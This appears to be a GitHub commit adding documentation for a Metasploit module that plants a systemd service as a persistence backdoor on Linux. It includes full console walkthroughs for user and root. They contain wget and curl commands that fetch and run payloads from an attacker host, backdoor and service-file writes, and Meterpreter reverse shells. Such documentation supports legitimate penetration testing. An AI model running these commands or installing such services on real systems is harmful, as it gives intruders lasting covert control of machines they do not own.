Skip to content

Commit 8b6aede

Browse files
h00dieh00die
committed
update systemd to persistence mixin
1 parent 140232d commit 8b6aede

File tree

2 files changed

+425
-0
lines changed

2 files changed

+425
-0
lines changed

documentation/modules/exploit/linux/persistence/init_systemd.md

Lines changed: 208 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,208 @@
1+
## Vulnerable Application
2+
3+
This module will create a service on the box, and mark it for auto-restart.
4+
We need enough access to write service files and potentially restart services
5+
systemd should be available on the following systems:
6+
7+
Targets:
8+
9+
* CentOS 7
10+
* Debian >= 7, <=8
11+
* Fedora >= 15
12+
* Ubuntu >= 15.04
13+
14+
Verified on Ubuntu 18.04.3
15+
16+
## Verification Steps
17+
18+
1. Exploit a box
19+
2. `use exploit/linux/persistence/init_systemd`
20+
3. `set SESSION <session>`
21+
4. `set PAYLOAD <payload>`
22+
5. `set LHOST <lhost>`
23+
6. `exploit`
24+
25+
## Options
26+
27+
### SERVICE
28+
29+
The name of the service to create. If not chosen, a random one is created.
30+
31+
### PAYLOAD_NAME
32+
33+
The name of the file to write with our shell if a non-cmd payload is used. If not chosen, a random one is created.
34+
35+
### Target: systemd
36+
37+
Requires `root` permission, or equivalent. Installs the service into `/lib/systemd/system/#{service_filename}.service`
38+
39+
### Target: systemd user
40+
41+
Requires user level permission. Installs the service into `#{home}/.config/systemd/user/#{service_filename}.service`
42+
43+
## Scenarios
44+
45+
### Ubuntu 18.04
46+
47+
#### user
48+
49+
Initial access vector via web delivery
50+
51+
```
52+
resource (/root/.msf4/msfconsole.rc)> setg verbose true
53+
verbose => true
54+
resource (/root/.msf4/msfconsole.rc)> setg lhost 111.111.1.111
55+
lhost => 111.111.1.111
56+
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
57+
[*] Using configured payload python/meterpreter/reverse_tcp
58+
resource (/root/.msf4/msfconsole.rc)> set srvport 8181
59+
srvport => 8181
60+
resource (/root/.msf4/msfconsole.rc)> set target 7
61+
target => 7
62+
resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
63+
payload => linux/x64/meterpreter/reverse_tcp
64+
resource (/root/.msf4/msfconsole.rc)> set lport 4545
65+
lport => 4545
66+
resource (/root/.msf4/msfconsole.rc)> set URIPATH l
67+
URIPATH => l
68+
resource (/root/.msf4/msfconsole.rc)> run
69+
[*] Exploit running as background job 0.
70+
[*] Exploit completed, but no session was created.
71+
[*] Starting persistent handler(s)...
72+
[*] Started reverse TCP handler on 111.111.1.111:4545
73+
[*] Using URL: http://111.111.1.111:8181/l
74+
[*] Server started.
75+
[*] Run the following command on the target machine:
76+
wget -qO A0IMfkxw --no-check-certificate http://111.111.1.111:8181/l; chmod +x A0IMfkxw; ./A0IMfkxw& disown
77+
[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) >
78+
[*] 222.222.2.222 web_delivery - Delivering Payload (250 bytes)
79+
[*] Transmitting intermediate stager...(126 bytes)
80+
[*] Sending stage (3045380 bytes) to 222.222.2.222
81+
[*] Meterpreter session 1 opened (111.111.1.111:4545 -> 222.222.2.222:35670) at 2025-02-12 16:51:31 -0500
82+
```
83+
84+
Persistence
85+
86+
```
87+
[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/linux/persistence/init_systemd
88+
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
89+
[msf](Jobs:1 Agents:1) exploit(linux/persistence/init_systemd) > set session 1
90+
session => 1
91+
[msf](Jobs:1 Agents:1) exploit(linux/persistence/init_systemd) > set target 1
92+
target => 1
93+
[msf](Jobs:1 Agents:1) exploit(linux/persistence/init_systemd) > exploit
94+
[*] Command to run on remote host: curl -so ./AfUflryvMrcV http://111.111.1.111:8080/Hg3DGEu9GqlWD06kh4AzFg;chmod +x ./AfUflryvMrcV;./AfUflryvMrcV&
95+
[*] Exploit running as background job 1.
96+
[*] Exploit completed, but no session was created.
97+
[msf](Jobs:2 Agents:1) exploit(linux/persistence/init_systemd) >
98+
[*] Fetch handler listening on 111.111.1.111:8080
99+
[*] HTTP server started
100+
[*] Adding resource /Hg3DGEu9GqlWD06kh4AzFg
101+
[*] Started reverse TCP handler on 111.111.1.111:4444
102+
[*] Running automatic check ("set AutoCheck false" to disable)
103+
[!] Payloads in /tmp will only last until reboot, you want to choose elsewhere.
104+
[+] The target appears to be vulnerable. /tmp/ is writable and system is systemd based
105+
[!] Payloads in /tmp will only last until reboot, you want to choose elsewhere.
106+
[*] Writing backdoor to /tmp//wiyCnjJRK
107+
[*] Creating user service directory
108+
[*] Writing service: /home/ubuntu/.config/systemd/user/hakiMwGMnXA.service
109+
[*] Reloading manager configuration
110+
[*] Enabling service
111+
[*] Starting service: hakiMwGMnXA
112+
[*] Client 222.222.2.222 requested /Hg3DGEu9GqlWD06kh4AzFg
113+
[*] Sending payload to 222.222.2.222 (curl/7.58.0)
114+
[*] Transmitting intermediate stager...(126 bytes)
115+
[*] Sending stage (3045380 bytes) to 222.222.2.222
116+
[*] Meterpreter-compatible Cleaup RC file: /root/.msf4/logs/persistence/ubuntu18desktop.local_20250212.5212/ubuntu18desktop.local_20250212.5212.rc
117+
[*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.222.2.222:58360) at 2025-02-12 16:52:13 -0500
118+
[msf](Jobs:2 Agents:2) exploit(linux/persistence/init_systemd) > sessions -i 2
119+
[*] Starting interaction with 2...
120+
(Meterpreter 2)(/home/ubuntu) > sysinfo
121+
Computer : ubuntu18desktop.local
122+
OS : Ubuntu 18.04 (Linux 5.3.0-26-generic)
123+
Architecture : x64
124+
BuildTuple : x86_64-linux-musl
125+
Meterpreter : x64/linux
126+
(Meterpreter 2)(/home/ubuntu) > getuid
127+
Server username: ubuntu
128+
```
129+
130+
#### root
131+
132+
Initial access vector via web delivery
133+
134+
```
135+
resource (/root/.msf4/msfconsole.rc)> setg verbose true
136+
verbose => true
137+
resource (/root/.msf4/msfconsole.rc)> setg lhost 111.111.1.111
138+
lhost => 111.111.1.111
139+
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
140+
[*] Using configured payload python/meterpreter/reverse_tcp
141+
resource (/root/.msf4/msfconsole.rc)> set srvport 8181
142+
srvport => 8181
143+
resource (/root/.msf4/msfconsole.rc)> set target 7
144+
target => 7
145+
resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
146+
payload => linux/x64/meterpreter/reverse_tcp
147+
resource (/root/.msf4/msfconsole.rc)> set lport 4545
148+
lport => 4545
149+
resource (/root/.msf4/msfconsole.rc)> set URIPATH l
150+
URIPATH => l
151+
resource (/root/.msf4/msfconsole.rc)> run
152+
[*] Exploit running as background job 0.
153+
[*] Exploit completed, but no session was created.
154+
[*] Starting persistent handler(s)...
155+
[*] Started reverse TCP handler on 111.111.1.111:4545
156+
[*] Using URL: http://111.111.1.111:8181/l
157+
[*] Server started.
158+
[*] Run the following command on the target machine:
159+
wget -qO Xz9l4YxP --no-check-certificate http://111.111.1.111:8181/l; chmod +x Xz9l4YxP; ./Xz9l4YxP& disown
160+
[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) >
161+
[*] Transmitting intermediate stager...(126 bytes)
162+
[*] Sending stage (3045380 bytes) to 222.222.2.222
163+
[*] Meterpreter session 1 opened (111.111.1.111:4545 -> 222.222.2.222:35802) at 2025-02-12 16:54:10 -0500
164+
[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > sessions -i 1
165+
[*] Starting interaction with 1...
166+
(Meterpreter 1)(/home/ubuntu) > getuid
167+
Server username: root
168+
(Meterpreter 1)(/home/ubuntu) > sysinfo
169+
Computer : ubuntu18desktop.local
170+
OS : Ubuntu 18.04 (Linux 5.3.0-26-generic)
171+
Architecture : x64
172+
BuildTuple : x86_64-linux-musl
173+
Meterpreter : x64/linux
174+
(Meterpreter 1)(/home/ubuntu) > background
175+
[*] Backgrounding session 1...
176+
```
177+
178+
Persistence
179+
180+
```
181+
[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/linux/persistence/init_systemd
182+
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
183+
[msf](Jobs:1 Agents:1) exploit(linux/persistence/init_systemd) > set session 1
184+
session => 1
185+
[msf](Jobs:1 Agents:1) exploit(linux/persistence/init_systemd) > exploit
186+
[*] Command to run on remote host: curl -so ./pCnRnSfZCFa http://111.111.1.111:8080/Hg3DGEu9GqlWD06kh4AzFg;chmod +x ./pCnRnSfZCFa;./pCnRnSfZCFa&
187+
[*] Exploit running as background job 1.
188+
[*] Exploit completed, but no session was created.
189+
[msf](Jobs:2 Agents:1) exploit(linux/persistence/init_systemd) >
190+
[*] Fetch handler listening on 111.111.1.111:8080
191+
[*] HTTP server started
192+
[*] Adding resource /Hg3DGEu9GqlWD06kh4AzFg
193+
[*] Started reverse TCP handler on 111.111.1.111:4444
194+
[*] Running automatic check ("set AutoCheck false" to disable)
195+
[!] Payloads in /tmp will only last until reboot, you want to choose elsewhere.
196+
[+] The target appears to be vulnerable. /tmp/ is writable and system is systemd based
197+
[!] Payloads in /tmp will only last until reboot, you want to choose elsewhere.
198+
[*] Writing backdoor to /tmp//nfiWHmr
199+
[*] Writing service: /lib/systemd/system/SBFzvKrWjH.service
200+
[*] Enabling service
201+
[*] Starting service
202+
[*] Client 222.222.2.222 requested /Hg3DGEu9GqlWD06kh4AzFg
203+
[*] Sending payload to 222.222.2.222 (curl/7.58.0)
204+
[*] Transmitting intermediate stager...(126 bytes)
205+
[*] Sending stage (3045380 bytes) to 222.222.2.222
206+
[*] Meterpreter-compatible Cleaup RC file: /root/.msf4/logs/persistence/ubuntu18desktop.local_20250212.5514/ubuntu18desktop.local_20250212.5514.rc
207+
[*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.222.2.222:58406) at 2025-02-12 16:55:15 -0500
208+
```

0 commit comments

Comments
 (0)